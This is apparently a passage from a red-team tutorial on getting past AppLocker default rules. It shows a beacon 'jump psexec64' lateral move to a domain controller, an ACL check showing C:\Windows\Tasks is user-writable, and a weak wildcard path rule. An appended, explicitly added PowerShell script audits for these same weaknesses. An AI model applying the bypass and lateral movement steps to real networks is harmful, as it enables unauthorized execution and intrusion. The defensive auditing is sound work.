Writeable Paths

The default AppLocker rules allow execution from anywhere within C:\Program Files and C:\Windows (including subdirectories). Moving laterally to a protected machine via psexec is trivial, because the service executable is written into C:\Windows, a location the default rules already permit.

beacon> jump psexec64 dc.dev-studio.com smb
Started service b8f5313 on dc.dev-studio.com
[+] established link to child beacon: 10.10.150.10

If you're on a protected machine as a standard user, there are several directories within C:\Windows that are writeable. One such example is C:\Windows\Tasks. This would allow us to copy an executable into this directory and run it.

beacon> powershell Get-Acl C:\Windows\Tasks | fl

Path   : Microsoft.PowerShell.Core\FileSystem::C:\Windows\Tasks
Owner  : NT AUTHORITY\SYSTEM
Group  : NT AUTHORITY\SYSTEM
Access : CREATOR OWNER Allow  268435456
         NT AUTHORITY\Authenticated Users Allow  CreateFiles, ReadAndExecute, Synchronize    <---
         NT AUTHORITY\SYSTEM Allow  268435456
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  268435456
         BUILTIN\Administrators Allow  FullControl
Audit  : 
Sddl   : O:SYG:SYD:PAI(A;OICIIO;GA;;;CO)(A;;0x1200ab;;;AU)(A;OICIIO;GA;;;SY)(A;;FA;;;SY)(A;OICIIO;GA;;;BA)(A;;FA;;;BA)

When enumerating the rules, you may also find additional weak rules that system administrators have put in. This is an example of a rule I've genuinely seen in production:

<FilePathCondition Path="*\AppV\*"/>
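To find both kinds of exposure on a managed host before anyone else does, here is an added audit script (not part of the original post): it walks the roots the default rules allow and reports directories where low-privileged principals hold create/write rights (the C:\Windows\Tasks case above), then lists effective Allow path rules whose condition starts with a wildcard, as the AppV rule does. The root list, the principal list and the leading-wildcard heuristic are assumptions made for this example.

```powershell
# Added audit example, not from the original page. Assumes the default rule roots
# below and a fixed list of low-privileged principals worth flagging.
$lowPriv = @('NT AUTHORITY\Authenticated Users', 'BUILTIN\Users', 'Everyone', 'NT AUTHORITY\INTERACTIVE')
# Any of these bits lets a principal add or change files in a directory.
$writeBits = [System.Security.AccessControl.FileSystemRights]'CreateFiles, CreateDirectories, Write, Modify, FullControl'

function Get-WritableAllowedDirs {
    param([string[]]$Roots = @('C:\Windows', 'C:\Program Files', 'C:\Program Files (x86)'))
    foreach ($root in $Roots) {
        Get-ChildItem -Path $root -Directory -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            $acl = Get-Acl -Path $_.FullName -ErrorAction SilentlyContinue
            if (-not $acl) { return }   # skip directories we cannot read the ACL of
            foreach ($ace in $acl.Access) {
                if ($ace.AccessControlType -ne 'Allow') { continue }
                if ($lowPriv -notcontains $ace.IdentityReference.Value) { continue }
                $rights = [int64]$ace.FileSystemRights
                # Untyped generic rights (e.g. 268435456 = GENERIC_ALL, 0x40000000 = GENERIC_WRITE)
                # do not map to named enum members, so test the generic bits separately.
                $generic = ($rights -band 0x50000000) -ne 0
                $named   = ($rights -band [int64]$writeBits) -ne 0
                if ($generic -or $named) {
                    [pscustomobject]@{ Path = $_.FullName; Principal = $ace.IdentityReference.Value; Rights = $ace.FileSystemRights }
                    break   # one finding per directory is enough
                }
            }
        }
    }
}

function Get-WeakPathRules {
    # Effective (merged local + domain) policy as XML; only Exe Allow path rules matter here.
    [xml]$policy = Get-AppLockerPolicy -Effective -Xml
    $xpath = "//RuleCollection[@Type='Exe']//FilePathRule[@Action='Allow']/Conditions/FilePathCondition"
    foreach ($cond in $policy.SelectNodes($xpath)) {
        $path = $cond.GetAttribute('Path')
        # A leading wildcard matches that folder name under any drive or parent, so the
        # rule holds wherever a user can create a directory of that name.
        if ($path.StartsWith('*')) {
            $rule = $cond.ParentNode.ParentNode
            [pscustomobject]@{ Rule = $rule.GetAttribute('Name'); Path = $path }
        }
    }
}

Get-WritableAllowedDirs | Format-Table -AutoSize
Get-WeakPathRules       | Format-Table -AutoSize
```

Run it on a representative workstation; the ACL pass is noisy on first run, so compare results against a known-good baseline and either tighten the ACLs or add Deny/exception rules for the directories it reports.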
